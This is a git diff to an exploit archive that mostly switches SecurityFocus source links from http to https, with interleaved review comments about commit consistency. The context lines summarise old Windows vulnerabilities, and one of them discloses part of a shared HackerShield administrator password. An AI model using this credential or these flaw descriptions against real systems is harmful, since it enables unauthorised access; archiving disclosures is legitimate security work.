a/exploits/windows/remote/19449.c b/exploits/windows/remote/19449.c index 41a176aff..bf2bea1e7 100644 --- a/exploits/windows/remote/19449.c +++ b/exploits/windows/remote/19449.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/573/info +// source: https://www.securityfocus.com/bid/573/info The Chocoa IRC client has an unchecked buffer in the code that processes channel topics. If the server returns a topic that overwrites the client's buffer and contains exploit code arbitrary commands can be run on the client system. 
diff --git a/exploits/windows/remote/19450.c b/exploits/windows/remote/19450.c index a4e87df22..0277260cc 100644 --- a/exploits/windows/remote/19450.c +++ b/exploits/windows/remote/19450.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/574/info +// source: https://www.securityfocus.com/bid/574/info The ALMail32 POP3 client conatins unchecked buffers in the header parsing code. An abnormally long FROM: or TO: field in the header of an incoming email will overwrite the buffer and allow arbitrary code to be executed. diff --git a/exploits/windows/remote/19468.txt b/exploits/windows/remote/19468.txt index d5773018b..cf9e87e28 100644 --- a/exploits/windows/remote/19468.txt +++ b/exploits/windows/remote/19468.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability -source: http://www.securityfocus.com/bid/598/info +source: https://www.securityfocus.com/bid/598/info The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message. diff --git a/exploits/windows/remote/19486.c b/exploits/windows/remote/19486.c index b5a1a80e1..a39dae9b3 100644 --- a/exploits/windows/remote/19486.c +++ b/exploits/windows/remote/19486.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/618/info +source: https://www.securityfocus.com/bid/618/info In several versions of Netscape Communicator, there is an unchecked buffer in the code that handles EMBED tags. The buffer is in the 'plugins page' option. This vulnerability can be exploited by a malicious webpage. */ 
diff --git a/exploits/windows/remote/19487.txt b/exploits/windows/remote/19487.txt index 7740cde24..90eb410a0 100644 --- a/exploits/windows/remote/19487.txt +++ b/exploits/windows/remote/19487.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0/5.0 for Windows 95/Windows NT 4/Windows 2000/Windows 95/Windows 98 ActiveX "Eyedog" Vulnerability -source: http://www.securityfocus.com/bid/619/info +source: https://www.securityfocus.com/bid/619/info The Eyedog ActiveX control is marked 'safe for scripting' although it permits registry access and other information gathering methods to be used. It also contains a buffer overflow error. These weaknesses can be exploited remotely via a malicious webpage or email. diff --git a/exploits/windows/remote/19490.txt b/exploits/windows/remote/19490.txt index 75f547563..68a6d94c7 100644 --- a/exploits/windows/remote/19490.txt +++ b/exploits/windows/remote/19490.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Import/Export Favorites Vulnerability -source: http://www.securityfocus.com/bid/627/info +source: https://www.securityfocus.com/bid/627/info The ImportExportFavorites() method, used to import and export favorites to/from a file in IE5, can be made to write to any file on the system, in some cases from an email or remote webpage. diff --git a/exploits/windows/remote/19491.txt b/exploits/windows/remote/19491.txt index c8c41f0d1..0b618e26a 100644 --- a/exploits/windows/remote/19491.txt +++ b/exploits/windows/remote/19491.txt 
@@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/628/info +source: https://www.securityfocus.com/bid/628/info The BindView HackerShield product (originally Netect's HackerShield) creates an NT service account called NetectAgentAdmin$. This account is a member of the local administrators group on an NT host. The service account password is not machine specific, nor is it randomly generated. The password is fourteen characters long and includes non-printable ascii characters, therefore, password cracking tools like L0phtcrack may not be able to fully display the password. -Using Paul Ashton's LSA secrets code against a Service Pack 3 machine with HackerShield installed, it is possible to recover the plaintext password for this account. As this password is the same for every HackerShield installation, an attacker could use this username / password combination to remotely access other NT hosts running the HackerShield product. +Using Paul Ashton's LSA secrets code against a Service Pack 3 machine with HackerShield installed, it is possible to recover the plaintext password for this account. As this password is the same for every HackerShield installation, an attacker could use this username / password combination to remotely access other NT hosts running the HackerShield product. The first twelve characters of the NetectAgentAdmin$ account password are: np7m4qM1M7VT diff --git a/exploits/windows/remote/19494.c b/exploits/windows/remote/19494.c index fda6839ff..59432f307 100644 --- a/exploits/windows/remote/19494.c +++ b/exploits/windows/remote/19494.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/632/info +// source: https://www.securityfocus.com/bid/632/info There is a buffer overflow on the SmartServer3 SMTP service (long MAIL FROM:) that may allow an intruder to execute arbitrary code on the target server. diff --git a/exploits/windows/remote/19495.c b/exploits/windows/remote/19495.c index 8600aeb76..df71d84c2 100644 
--- a/exploits/windows/remote/19495.c +++ b/exploits/windows/remote/19495.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/633/info +// source: https://www.securityfocus.com/bid/633/info There is a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may allow an attacker to execute arbitrary code on the target server. diff --git a/exploits/windows/remote/19496.c b/exploits/windows/remote/19496.c index 07e18c42d..d12e75ff8 100644 --- a/exploits/windows/remote/19496.c +++ b/exploits/windows/remote/19496.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/634/info +// source: https://www.securityfocus.com/bid/634/info There is a buffer overflow in the FuseMail POP service (long USER,PASS) that may allow an intruder to execute arbitrary code on the target server. diff --git a/exploits/windows/remote/19514.txt b/exploits/windows/remote/19514.txt index 14f572aaa..c26a328bb 100644 --- a/exploits/windows/remote/19514.txt +++ b/exploits/windows/remote/19514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/666/info +source: https://www.securityfocus.com/bid/666/info There is a buffer overflow in the 1.3.188 version of the Adobe Acrobat ActiveX control (pdf.ocx) that ships with Acrobat Viewer 4.0. This ActiveX control is marked 'Safe for Scripting' within Internet Explorer 4.X. Arbitrary commands may be executed if the ActiveX control is run in a malicious manner diff --git a/exploits/windows/remote/19515.txt b/exploits/windows/remote/19515.txt index 4da6e7199..9a49cc514 100644 --- a/exploits/windows/remote/19515.txt +++ b/exploits/windows/remote/19515.txt 
@@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow -source: http://www.securityfocus.com/bid/667/info +source: https://www.securityfocus.com/bid/667/info There is a buffer overflow in the setupctl ActiveX control that used to ship with some versions of Microsoft's Internet Explorer. This ActiveX control is used to link to an update site at Microsoft and is marked 'Safe for Scripting' . Arbitrary commands may be executed if the ActiveX control is run in a malicious manner. diff --git a/exploits/windows/remote/19521.txt b/exploits/windows/remote/19521.txt index 0c2fa8fdd..392e73d04 100644 --- a/exploits/windows/remote/19521.txt +++ b/exploits/windows/remote/19521.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4/Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 hhopen OLE Control Buffer Overflow Vulnerability -source: http://www.securityfocus.com/bid/669/info +source: https://www.securityfocus.com/bid/669/info There is a buffer overflow in the 1.0.0.1 version of the hhopen OLE control (hhopen.ocx) that ships with some versions of Internet Explorer. This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the OLE control is run in a malicious manner. diff --git a/exploits/windows/remote/19530.txt b/exploits/windows/remote/19530.txt index 97315a625..dddd1423f 100644 --- a/exploits/windows/remote/19530.txt +++ b/exploits/windows/remote/19530.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 Download Behavior Vulnerability -source: http://www.securityfocus.com/bid/674/info +source: https://www.securityfocus.com/bid/674/info The "download behavior" feature of Microsoft's Internet Explorer 5 may allow a malicious web site operator to read files on an IE5 client computer or on a computer that is in the client's 'Local Intranet' web content zone. 
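Review bot: The hunk for exploits/windows/remote/19491.txt (the HackerShield entry, earlier in this patch) is the only one with an `-1,8 +1,8` range, and it removes and re-adds the paragraph beginning "Using Paul Ashton's LSA secrets code" with no visible difference, which points to a whitespace-only change riding along with the URL scheme update. Either drop that line from this commit or move whitespace normalisation into its own commit, so that this one stays a mechanical http to https substitution that can be checked by pattern.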
diff --git a/exploits/windows/remote/19537.txt b/exploits/windows/remote/19537.txt index 1bedfceb3..5392a46d0 100644 --- a/exploits/windows/remote/19537.txt +++ b/exploits/windows/remote/19537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/689/info +source: https://www.securityfocus.com/bid/689/info TeamTrack 3.00 has a built-in webserver which is meant to be used during the evaluation period, or until IIS or Netscape Enterprise/FastTrack is installed. This server does not filter out requested paths containing the ../ sequence. Because of this, an attacker can specify a file outside of the normal web file structure. The name and relative path (from the web root) of the file must be known by the attacker. diff --git a/exploits/windows/remote/19539.txt b/exploits/windows/remote/19539.txt index 10549eafe..fc60ca231 100644 --- a/exploits/windows/remote/19539.txt +++ b/exploits/windows/remote/19539.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0/Unix 5.0 IFRAME Vulnerability -source: http://www.securityfocus.com/bid/696/info +source: https://www.securityfocus.com/bid/696/info Internet Explorer 5 will allow a malicious web page to read the contents of local files through a weakness in the IE5 security model. Normally the document.execCommand method is restricted from reading and returning data on the local machine, however if the method is called from within an IFRAME this restriction can be circumvented. diff --git a/exploits/windows/remote/19540.txt b/exploits/windows/remote/19540.txt index 57fdc7d07..71b26f34e 100644 --- a/exploits/windows/remote/19540.txt +++ b/exploits/windows/remote/19540.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/699/info +source: https://www.securityfocus.com/bid/699/info The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot. diff --git a/exploits/windows/remote/19559.txt b/exploits/windows/remote/19559.txt index 01780dda0..43a077813 100644 --- a/exploits/windows/remote/19559.txt +++ b/exploits/windows/remote/19559.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Microsoft Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0/Unix 5.0 Javascript URL Redirection Vulnerability -source: http://www.securityfocus.com/bid/722/info +source: https://www.securityfocus.com/bid/722/info A malicious web site operator could design a web page that, when visited by an IE5 user, would read a local file from the victim host (or any file on the victim's network to which the victim has access) and send the contents of that file to a designated remote location. diff --git a/exploits/windows/remote/19561.c b/exploits/windows/remote/19561.c index 633ca2019..8832eeb01 100644 --- a/exploits/windows/remote/19561.c +++ b/exploits/windows/remote/19561.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/730/info +// source: https://www.securityfocus.com/bid/730/info // // True North Software's Internet Anywhere Mail Server has various weaknesses that could allow an attacker to remotely crash the server running this software.. The POP3 commands "list", "retr" .uidl" and "user" and the SMTP command "vrfy", if sent with abnormally long arguments, will crash the server. These limits seem to be around 200 characters for the POP3 commands, and around 250 characters for the SMTP command. // diff --git a/exploits/windows/remote/19566.c b/exploits/windows/remote/19566.c index 9e4fd1437..d92927993 100644 --- a/exploits/windows/remote/19566.c 
+++ b/exploits/windows/remote/19566.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/739/info +// source: https://www.securityfocus.com/bid/739/info There is a remotely exploitable buffer overflow vulnerability in the CGI program "imagemap", which is distributed with Omnicron's OmniHTTPD. During operations made on arguments passed to the program, a lack of bounds checking on a strcpy() call can allow for arbitrary code to be executed on the machine running the server. diff --git a/exploits/windows/remote/19568.txt b/exploits/windows/remote/19568.txt index 9a1eacd30..0561ccb70 100644 --- a/exploits/windows/remote/19568.txt +++ b/exploits/windows/remote/19568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/746/info +source: https://www.securityfocus.com/bid/746/info The URL Live! free webserver from Pacific software is susceptible to the "../" directory traversal vulnerability. By using the '../' string in a URL, an attacker can gain read access to files outside the intended web file structure. diff --git a/exploits/windows/remote/19570.txt b/exploits/windows/remote/19570.txt index 81e0c0ac5..62a6a79e3 100644 --- a/exploits/windows/remote/19570.txt +++ b/exploits/windows/remote/19570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/747/info +source: https://www.securityfocus.com/bid/747/info WFTPD is reported prone to a remote buffer overflow vulnerability. The issue exists due to a lack of sufficient bounds checking performed on MKD and CWD arguments. It is reported that superfluous data passed to MKD first and then to CWD results in the overflow. diff --git a/exploits/windows/remote/19580.txt b/exploits/windows/remote/19580.txt index 1f083c665..84ae3e06e 100644 --- a/exploits/windows/remote/19580.txt +++ b/exploits/windows/remote/19580.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/755/info +source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. diff --git a/exploits/windows/remote/19581.txt b/exploits/windows/remote/19581.txt index cb46bd170..ef34167e9 100644 --- a/exploits/windows/remote/19581.txt +++ b/exploits/windows/remote/19581.txt @@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/755/info +source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. -source: http://www.securityfocus.com/bid/755/info +source: https://www.securityfocus.com/bid/755/info The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote buffer overflow vulnerability. The buffer overflow can be initiated by passing 856 characters in the password field. diff --git a/exploits/windows/remote/19584.c b/exploits/windows/remote/19584.c index fe264bf30..93506d679 100644 --- a/exploits/windows/remote/19584.c +++ b/exploits/windows/remote/19584.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/759/info +// source: https://www.securityfocus.com/bid/759/info The Skyfull mail server version 1.1.4 has an unchecked buffer into which the argument from the MAIL FROM command is placed. This buffer can be overwritten and arbitrary code can be executed. diff --git a/exploits/windows/remote/19586.c b/exploits/windows/remote/19586.c index 27705eebd..70c54340a 100644 --- a/exploits/windows/remote/19586.c +++ b/exploits/windows/remote/19586.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/761/info +// source: https://www.securityfocus.com/bid/761/info In certain versions of the BTD Zom-Mail server there exists a buffer overflow which may be remotely exploitable by malicious users. The problem in question is in the handling of overly (past 256 chars) long file names for file attachments. diff --git a/exploits/windows/remote/19587.txt b/exploits/windows/remote/19587.txt index 568ccb3f8..38a683529 100644 --- a/exploits/windows/remote/19587.txt +++ b/exploits/windows/remote/19587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/762/info +source: https://www.securityfocus.com/bid/762/info Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data. diff --git a/exploits/windows/remote/19588.c b/exploits/windows/remote/19588.c index 987ef6cab..6deeb473f 100644 --- a/exploits/windows/remote/19588.c +++ b/exploits/windows/remote/19588.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/763/info +// source: https://www.securityfocus.com/bid/763/info Certain versions of the IBM Web page printout software "IBM HomePagePrint " can in some instances be remotely exploited by malicious webservers. The problem lies in a buffer overflow in the code which handles IMG_SRC tags. If a page containing a specially constructed IMG SRC tag is previewed or printed using the IBM HomePagePrint software, arbitrary code can be run on the client. diff --git a/exploits/windows/remote/19589.txt b/exploits/windows/remote/19589.txt index 249138feb..9ce608b72 100644 --- a/exploits/windows/remote/19589.txt +++ b/exploits/windows/remote/19589.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/764/info +source: https://www.securityfocus.com/bid/764/info The aVirt Mail Server has a weakness in the code that handles the RCPT TO command. By specifying a path in the command instead of an email recipient , an attacker could cause the mail server to create a directory in the server's local filesystem. diff --git a/exploits/windows/remote/19591.txt b/exploits/windows/remote/19591.txt index 9630a3391..8a1115bef 100644 --- a/exploits/windows/remote/19591.txt +++ b/exploits/windows/remote/19591.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 3/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Outlook 98 0 window.open Redirect Vulnerability -source: http://www.securityfocus.com/bid/766/info +source: https://www.securityfocus.com/bid/766/info If window.open is called with a target URL that redirects to a client-side file and then a variable is created pointing to the contents of the new window, the contents of the new window (the local file) can be read and possibly manipulated or transmitted by other code in the webpage. diff --git a/exploits/windows/remote/19592.asm b/exploits/windows/remote/19592.asm index f55e60277..ede737ae8 100644 --- a/exploits/windows/remote/19592.asm +++ b/exploits/windows/remote/19592.asm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/767/info +source: https://www.securityfocus.com/bid/767/info At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server. 
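Review bot: In exploits/windows/remote/19592.asm the new `source:` line is still uncommented, whereas the .c files in this patch gain a `// ` prefix on that same line (19593.c, for the same BID 767, is one of them). If the point of the prefix is to keep the source files parseable, the .asm header needs the assembler's comment marker as well, and 19614.asm, 19612.pl and 19734.java show the same gap; if only .c files are meant to be normalised, the commit message should say so.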
diff --git a/exploits/windows/remote/19593.c b/exploits/windows/remote/19593.c index 0d84e70e9..e068ca272 100644 --- a/exploits/windows/remote/19593.c +++ b/exploits/windows/remote/19593.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/767/info +// source: https://www.securityfocus.com/bid/767/info At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server. diff --git a/exploits/windows/remote/19595.c b/exploits/windows/remote/19595.c index e06e2f403..0ba25f904 100644 --- a/exploits/windows/remote/19595.c +++ b/exploits/windows/remote/19595.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/770/info +// source: https://www.securityfocus.com/bid/770/info There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server. diff --git a/exploits/windows/remote/19601.txt b/exploits/windows/remote/19601.txt index 6fcc45f8d..858529d4f 100644 --- a/exploits/windows/remote/19601.txt +++ b/exploits/windows/remote/19601.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/773/info +source: https://www.securityfocus.com/bid/773/info Etype's Eserv product is designed to be a one-source internet connectivity solution, incorporating mail, web, ftp, and proxy servers into one package. The web server will allow remote browsing of the entire filesystem by the usage of ../ strings in the URL. This gives an attacker read access to every file on the server's filesystem that the webserver has access to. diff --git a/exploits/windows/remote/19603.txt b/exploits/windows/remote/19603.txt index 0d45fda34..b6991e1a4 100644 --- a/exploits/windows/remote/19603.txt +++ b/exploits/windows/remote/19603.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4,Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Outlook 2000 0/98 0,Outlook Express 4.27.3110/4.72.2106/4.72.3120/4.72.3612 ActiveX CAB File Execution Vulnerability -source: http://www.securityfocus.com/bid/775/info +source: https://www.securityfocus.com/bid/775/info Introduction @@ -304,7 +304,7 @@ source: http://www.securityfocus.com/bid/775/info Links - http://www.securityfocus.com/bid/775/ - Active Setup control vulnerability details on securityfocus.com. + https://www.securityfocus.com/bid/775/ - Active Setup control vulnerability details on securityfocus.com. http://msdn.microsoft.com/library/periodic/period98/vbpj0798.htm - Documentation on the Active Setup control. http://www.microsoft.com/technet/security/bulletin/fq99-048.asp - Microsoft's security bulletin for the vulnerability. http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm - Microsoft's update for the control. diff --git a/exploits/windows/remote/19607.c b/exploits/windows/remote/19607.c index 45816394f..7f7152f7b 100644 --- a/exploits/windows/remote/19607.c +++ b/exploits/windows/remote/19607.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/779/info +// source: https://www.securityfocus.com/bid/779/info There is a overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile UNC or file:// URL in a web page or HTML email. The attack would occur when the page was loaded in a browser or the email was opened (including opening the email in a preview pane.) diff --git a/exploits/windows/remote/19608.c b/exploits/windows/remote/19608.c index deeee2144..6aa1ccf63 100644 --- a/exploits/windows/remote/19608.c +++ b/exploits/windows/remote/19608.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/779/info +// source: https://www.securityfocus.com/bid/779/info There is a overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile UNC or file:// URL in a web page or HTML email. The attack would occur when the page was loaded in a browser or the email was opened (including opening the email in a preview pane.) diff --git a/exploits/windows/remote/19611.txt b/exploits/windows/remote/19611.txt index 3c047208a..bbe4161f3 100644 --- a/exploits/windows/remote/19611.txt +++ b/exploits/windows/remote/19611.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/783/info +source: https://www.securityfocus.com/bid/783/info If an unusually long user name is passed to the Broker FTP server software, the program will crash. If the program is running as a service, the service will consume all available memory and crash the entire system. diff --git a/exploits/windows/remote/19612.pl b/exploits/windows/remote/19612.pl index 225d5c61a..13edcb1d1 100755 --- a/exploits/windows/remote/19612.pl +++ b/exploits/windows/remote/19612.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/787/info +source: https://www.securityfocus.com/bid/787/info There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server. diff --git a/exploits/windows/remote/19614.asm b/exploits/windows/remote/19614.asm index dc19f8307..ffba90209 100644 --- a/exploits/windows/remote/19614.asm +++ b/exploits/windows/remote/19614.asm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/787/info +source: https://www.securityfocus.com/bid/787/info There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server. diff --git a/exploits/windows/remote/19617.txt b/exploits/windows/remote/19617.txt index ce479e65f..2aa5ea10f 100644 --- a/exploits/windows/remote/19617.txt +++ b/exploits/windows/remote/19617.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/790/info +source: https://www.securityfocus.com/bid/790/info The POP server that is part of the NetcPlus SmartServer3 email server has an unchecked buffer that could allow an attacker to execute code on the server. If the USER command is followed by an argument of over 800 characters, the input buffer will be overflowed, and data from the argument will be passed to the system to be executed at the privelege level of the SmartServer program. diff --git a/exploits/windows/remote/19618.txt b/exploits/windows/remote/19618.txt index 75adf5b03..7fdda4262 100644 --- a/exploits/windows/remote/19618.txt +++ b/exploits/windows/remote/19618.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 Media Player ActiveX Error Message Vulnerability -source: http://www.securityfocus.com/bid/793/info +source: https://www.securityfocus.com/bid/793/info The Windows Media Player ActiveX control, shipped with IE 5, returns a specific error code if it is instructed to load a local file that does not exist. In this way, an attacker could determine whether or not a specified file on the victim's host exists. This could be used to determine user names and other facets of system configuration. diff --git a/exploits/windows/remote/19621.c b/exploits/windows/remote/19621.c index 5ff3d0b9b..c20bb17c9 100644 --- a/exploits/windows/remote/19621.c +++ b/exploits/windows/remote/19621.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/801/info +// source: https://www.securityfocus.com/bid/801/info Certain versions of EmailClub, a mail server package by Admiral Systems Inc. are vulnerable to a remote buffer overflow. This overflow is exploitable via EmailClub's POP3 server which fails to perform proper bounds checking on the 'From:' header on incoming e-mail. diff --git a/exploits/windows/remote/19622.c b/exploits/windows/remote/19622.c index 513f511f7..5f2b460b7 100644 
--- a/exploits/windows/remote/19622.c +++ b/exploits/windows/remote/19622.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/802/info +// source: https://www.securityfocus.com/bid/802/info Certain versions of the W4-Server 32-bits personal webserver by Antelope Software ship with a flawed script, Cgitest.exe. This compiled CGI script fails to perform bounds checking on user supplied data and is vulnerable to a buffer overflow. diff --git a/exploits/windows/remote/19623.c b/exploits/windows/remote/19623.c index 9cd33e9c6..2950943af 100644 --- a/exploits/windows/remote/19623.c +++ b/exploits/windows/remote/19623.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/803/info +// source: https://www.securityfocus.com/bid/803/info Certain versions of WebBBS by Mike Bryeans of International TeleCommunications contain a flaw in the initial login program. User supplied data via the login name and password are not bounds checked and can result in a buffer overflow. This leads a compromise of the system running WebBBS. diff --git a/exploits/windows/remote/19637.txt b/exploits/windows/remote/19637.txt index 765f408e2..12b6b5935 100644 --- a/exploits/windows/remote/19637.txt +++ b/exploits/windows/remote/19637.txt @@ -1,6 +1,6 @@ MS IE 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4 XML HTTP Redirect Vulnerability -source: http://www.securityfocus.com/bid/815/info +source: https://www.securityfocus.com/bid/815/info A vulnerability in the method IE5 uses to process XML data may allow a malicious web site owner to read files on a visiting user's computer. A web page may be created that contains an XML object type that contains instructions to read known files on a visitor's local host (and or domain). The IE5 client will allow the XML redirect to access files within its own domain. diff --git a/exploits/windows/remote/19662.txt b/exploits/windows/remote/19662.txt index ad35e7868..c3fba2dfb 100644 --- a/exploits/windows/remote/19662.txt 
+++ b/exploits/windows/remote/19662.txt @@ -1,6 +1,6 @@ Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 Subframe Spoofing Vulnerability -source: http://www.securityfocus.com/bid/855/info +source: https://www.securityfocus.com/bid/855/info IE's default security settings allow a malicious webpage to open a new browser, open another site's main frame in that new browser and then set any subframes to a URL of their choosing. This could lead to misappropriation of private information, among other problems. diff --git a/exploits/windows/remote/19679.txt b/exploits/windows/remote/19679.txt index 92f1f195e..17f081b1c 100644 --- a/exploits/windows/remote/19679.txt +++ b/exploits/windows/remote/19679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/874/info +source: https://www.securityfocus.com/bid/874/info Infoseek's Ultraseek enterprise search server listens on port 8765 by default for HTTP commands. The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed. diff --git a/exploits/windows/remote/19688.txt b/exploits/windows/remote/19688.txt index 3b24c6b0e..c2536728a 100644 --- a/exploits/windows/remote/19688.txt +++ b/exploits/windows/remote/19688.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/889/info +source: https://www.securityfocus.com/bid/889/info ZBSoft ZBServer Pro is an Internet and Intranet server that supports HTTP, Gopher, FTP and Chat Services. ZBServer is available for Microsoft Windows operating systems. diff --git a/exploits/windows/remote/19689.c b/exploits/windows/remote/19689.c index f6952984d..cc1a1a0d2 100644 --- a/exploits/windows/remote/19689.c +++ b/exploits/windows/remote/19689.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/889/info +// source: https://www.securityfocus.com/bid/889/info ZBSoft ZBServer Pro is an Internet and Intranet server that supports HTTP, Gopher, FTP and Chat Services. ZBServer is available for Microsoft Windows operating systems. diff --git a/exploits/windows/remote/19719.txt b/exploits/windows/remote/19719.txt index 535740777..926fbb3ae 100644 --- a/exploits/windows/remote/19719.txt +++ b/exploits/windows/remote/19719.txt @@ -1,6 +1,6 @@ Microsoft Internet Explorer 4.0 for Windows 3.1/Windows 95,Internet Explorer 5.0 for Windows 2000/Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.5 preview,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0,Internet Explorer 5.0.1 Security Zone Settings Lag Vulnerability -source: http://www.securityfocus.com/bid/923/info +source: https://www.securityfocus.com/bid/923/info When a new document is loaded into an IE window, IE will not update the Security Zone settings for that window until the new document is completely loaded. This means that if a local document is loaded, and then a large remote document is loaded that has JavaScript at the very beginning, the JavaScript may load and execute before the Security Zone settings are updated. This could lead to remote and untrusted JavaScript running as local trusted code, with full access to local files, cookies, etc. diff --git a/exploits/windows/remote/19724.txt b/exploits/windows/remote/19724.txt index 7184cc2fa..67efa31c1 100644 --- a/exploits/windows/remote/19724.txt +++ b/exploits/windows/remote/19724.txt 
